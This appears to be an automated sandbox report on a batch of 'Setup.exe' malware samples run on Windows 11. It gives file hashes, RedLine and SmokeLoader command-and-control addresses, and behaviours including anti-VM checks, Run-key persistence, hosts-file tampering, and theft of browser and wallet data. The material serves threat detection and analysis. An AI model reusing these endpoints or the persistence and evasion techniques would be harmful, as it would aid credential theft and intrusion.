Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
266s -
max time network
1814s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (30).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
3
deyrolorme.xyz:80
xariebelal.xyz:80
anihelardd.xyz:80
Extracted
redline
19.08
95.181.172.100:6795
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 968 4848 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6764 4848 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7012 4848 rundll32.exe 22 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral24/memory/2496-236-0x00000000076F0000-0x0000000007722000-memory.dmp family_redline behavioral24/memory/1020-238-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral24/memory/1020-237-0x0000000000000000-mapping.dmp family_redline behavioral24/memory/1020-273-0x0000000005130000-0x00000000056D6000-memory.dmp family_redline behavioral24/memory/2236-285-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral24/files/0x000200000002b22b-368.dat family_socelars behavioral24/files/0x000200000002b22b-367.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
description pid Process procid_target PID 1248 created 2236 1248 WerFault.exe 102 PID 724 created 4860 724 WerFault.exe 108 PID 1328 created 1848 1328 WerFault.exe 95 PID 2212 created 4980 2212 42hXQth_Pk27HUlnn9eeeq2j.exe 365 PID 4788 created 4964 4788 gcleaner.exe 101 PID 2984 created 4608 2984 WerFault.exe 268 PID 5956 created 4796 5956 WerFault.exe 360 PID 6072 created 4272 6072 YeDbPq32epL6yc6AcDn041hI.exe 129 PID 5448 created 3040 5448 taskkill.exe 137 PID 1020 created 2212 1020 WerFault.exe 139 PID 6080 created 5912 6080 WerFault.exe 162 PID 6472 created 6116 6472 WerFault.exe 180 PID 7136 created 676 7136 WerFault.exe 136 PID 6696 created 404 6696 WerFault.exe 183 PID 6940 created 5344 6940 WerFault.exe 182 PID 4248 created 5888 4248 WerFault.exe 178 PID 3168 created 3080 3168 WerFault.exe 276 PID 6128 created 1568 6128 WerFault.exe 215 PID 5248 created 6392 5248 WerFault.exe 279 PID 7080 created 4608 7080 WerFault.exe 268 PID 6736 created 5336 6736 WerFault.exe 464 PID 5360 created 5548 5360 Esplorarne.exe.com 169 PID 1872 created 6872 1872 Process not Found 359 PID 6428 created 4564 6428 WerFault.exe 191 PID 4548 created 3996 4548 WerFault.exe 320 PID 5264 created 736 5264 WerFault.exe 260 PID 3888 created 5572 3888 WerFault.exe 341 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5932 created 2056 5932 svchost.exe 367 PID 5932 created 2056 5932 svchost.exe 367 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral24/memory/4980-346-0x0000000004980000-0x0000000004A1D000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe File opened for modification C:\Windows\System32\drivers\SETC441.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETC441.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 4596 w32aqHUPTZAOK7mL1sdcXC3S.exe 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 3504 1s70wYAppnfh4epILpN1LXtC.exe 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 724 K5DoxdNTEGDQnU1A_ibMCK33.exe 344 K5DoxdNTEGDQnU1A_ibMCK33.exe 1832 yaA9xsNGEIw3vDLIIaEbBWpe.exe 1848 2105549.exe 2336 8683850.exe 2424 kzAGxUZZ0Y7rgkaissVSahJo.exe 2496 5534478.exe 1364 kzAGxUZZ0Y7rgkaissVSahJo.tmp 4964 5926773.exe 856 8aooTTpmqFUcPoRNHDe9oWwQ.exe 1020 y9dPhZn_rIlIaPgdmLEIuFmf.exe 8 WinHoster.exe 2236 8aooTTpmqFUcPoRNHDe9oWwQ.exe 3732 Setup.exe 4980 LGCH2-401_2021-08-18_14-40.exe 1776 Inlog.exe 4636 Cleaner Installation.exe 1388 Setup.exe 4468 ultramediaburner.tmp 4900 VPN.exe 4124 md7_7dfj.exe 4380 WEATHER Manager.tmp 4796 explorer.exe 5080 MediaBurner2.exe 812 VPN.tmp 1912 PBrowFile15.exe 1548 UltraMediaBurner.exe 660 LivelyScreenRecS1.9.exe 4272 MVkY6Mh19z4VbMAovKFG93fm.exe 1140 a94ROabhpSAzrBVAeX86PDPp.exe 4904 WerFault.exe 3040 0F50fp9zmxai_wsLKxr4zQ8O.exe 676 F1sKjVFx9UEwwUpYhEyrOm0c.exe 1448 MediaBurner2.tmp 4492 mrufmx8s4tjZFN8p2DcPhWYX.exe 2212 42hXQth_Pk27HUlnn9eeeq2j.exe 4608 82AB.exe 4696 xcjBJNp7LSL1DpSGw6PeSsFv.exe 4592 7OVnKitPPGlsAcOvo9MED0Gp.exe 3372 tMnqwbLrZMr9Kz95lBrhaLWh.exe 2940 Setup.exe 5328 jooyu.exe 5500 md8_8eus.exe 5596 customer3.exe 5912 zhaoy-game.exe 6060 msedge.exe 5548 7015786.exe 2716 3377047_logo_media.exe 5984 FaZ8_3dHeuauRdapJ3lEixDE.exe 5888 oCIMgs8_ldXYAYqhGh84yGu1.exe 5968 xDav0SfARivRtWPczlYtE9Iw.exe 5344 wDzLzrtxKna7j1CvL6DokD8a.exe 404 0PZCdaOFm6YACZSsTAbvdwzK.exe 5936 rXxYx6GIop9OrdkH8w6UZTdz.exe 6116 417d57ydNzkYOL4wMFXAsDON.exe 5340 hjVOi2wTWJVrmXB1GOLuRmoA.exe 5252 jfiag3g_gg.exe 4924 _l8YgX_rzu6d8PzbGyqdEPmr.exe 6072 YeDbPq32epL6yc6AcDn041hI.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YeDbPq32epL6yc6AcDn041hI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a94ROabhpSAzrBVAeX86PDPp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VzpWxsUZh2Hr5rF18nxp8q4T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rXxYx6GIop9OrdkH8w6UZTdz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _l8YgX_rzu6d8PzbGyqdEPmr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 66E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 66E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion w32aqHUPTZAOK7mL1sdcXC3S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VzpWxsUZh2Hr5rF18nxp8q4T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion xcjBJNp7LSL1DpSGw6PeSsFv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion xcjBJNp7LSL1DpSGw6PeSsFv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rXxYx6GIop9OrdkH8w6UZTdz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E290.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a94ROabhpSAzrBVAeX86PDPp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mrufmx8s4tjZFN8p2DcPhWYX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YeDbPq32epL6yc6AcDn041hI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _l8YgX_rzu6d8PzbGyqdEPmr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E290.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion w32aqHUPTZAOK7mL1sdcXC3S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mrufmx8s4tjZFN8p2DcPhWYX.exe -
Loads dropped DLL 51 IoCs
pid Process 1364 kzAGxUZZ0Y7rgkaissVSahJo.tmp 1364 kzAGxUZZ0Y7rgkaissVSahJo.tmp 4860 rundll32.exe 4468 ultramediaburner.tmp 4468 ultramediaburner.tmp 4636 Cleaner Installation.exe 4380 WEATHER Manager.tmp 4380 WEATHER Manager.tmp 812 VPN.tmp 812 VPN.tmp 1448 MediaBurner2.tmp 3032 P_xKE8bZV36d4TGV80AfTK07.tmp 3032 P_xKE8bZV36d4TGV80AfTK07.tmp 1028 Setup.exe 6756 MsiExec.exe 6756 MsiExec.exe 7044 msedge.exe 2024 Setup.tmp 2024 Setup.tmp 6968 rundll32.exe 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 6392 rundll32.exe 6584 MsiExec.exe 1760 GameBoxWin64.exe 1760 GameBoxWin64.exe 6584 MsiExec.exe 6584 MsiExec.exe 6680 Cleaner.exe 1760 GameBoxWin64.exe 6708 svrwebui.exe 6708 svrwebui.exe 6708 svrwebui.exe 6708 svrwebui.exe 4616 MsiExec.exe 6708 svrwebui.exe 6708 svrwebui.exe 4616 MsiExec.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe 6680 Cleaner.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral24/files/0x000100000002b1d9-152.dat themida behavioral24/files/0x000100000002b1d9-162.dat themida behavioral24/memory/4596-177-0x00000000009D0000-0x00000000009D1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8683850.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Lejyluqaesae.exe\"" 3377047_logo_media.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a94ROabhpSAzrBVAeX86PDPp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mrufmx8s4tjZFN8p2DcPhWYX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VzpWxsUZh2Hr5rF18nxp8q4T.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rXxYx6GIop9OrdkH8w6UZTdz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 66E5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Cleaner.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA w32aqHUPTZAOK7mL1sdcXC3S.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xcjBJNp7LSL1DpSGw6PeSsFv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YeDbPq32epL6yc6AcDn041hI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _l8YgX_rzu6d8PzbGyqdEPmr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E290.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: Setup.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\N: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\X: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 132 ipinfo.io 144 ipinfo.io 238 ipinfo.io 14 ipinfo.io 34 ipinfo.io 52 ipinfo.io 82 ipinfo.io 130 ipinfo.io 52 ip-api.com 134 ipinfo.io -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD02.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD02.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD00.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD01.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD01.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\SETAD00.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2d2be4c3-ea07-5249-aa52-4367727f5e1c}\tap0901.sys DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 4596 w32aqHUPTZAOK7mL1sdcXC3S.exe 1140 a94ROabhpSAzrBVAeX86PDPp.exe 4492 mrufmx8s4tjZFN8p2DcPhWYX.exe 4696 xcjBJNp7LSL1DpSGw6PeSsFv.exe 5512 VzpWxsUZh2Hr5rF18nxp8q4T.exe 5936 rXxYx6GIop9OrdkH8w6UZTdz.exe 6072 YeDbPq32epL6yc6AcDn041hI.exe 4924 _l8YgX_rzu6d8PzbGyqdEPmr.exe 6204 66E5.exe 3992 E290.exe 5336 Cleaner.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1188 set thread context of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 3600 set thread context of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 5016 set thread context of 2236 5016 Process not Found 102 PID 5340 set thread context of 2208 5340 hjVOi2wTWJVrmXB1GOLuRmoA.exe 232 PID 2264 set thread context of 1656 2264 4AEMR5olCp_tVzrTVx6ANnLU.exe 243 PID 5984 set thread context of 6616 5984 FaZ8_3dHeuauRdapJ3lEixDE.exe 322 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-2N5SM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-AVUQO.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-EFI2H.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-G4LLI.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 7OVnKitPPGlsAcOvo9MED0Gp.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll msedge.exe File created C:\Program Files (x86)\MaskVPN\is-M4PHU.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-NR2SH.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-V2Q8G.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VQONB.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 7OVnKitPPGlsAcOvo9MED0Gp.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe msedge.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-7SURD.tmp msedge.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-I3TGP.tmp msedge.exe File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-HBPQ4.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-F2RAL.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 7OVnKitPPGlsAcOvo9MED0Gp.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat msedge.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-05J7N.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-EMOKK.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d md7_7dfj.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe xDav0SfARivRtWPczlYtE9Iw.exe File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat msedge.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-7H1OT.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-QFIDE.tmp Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-C089V.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\is-LL83R.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-NHSSG.tmp Setup.tmp File created C:\Program Files 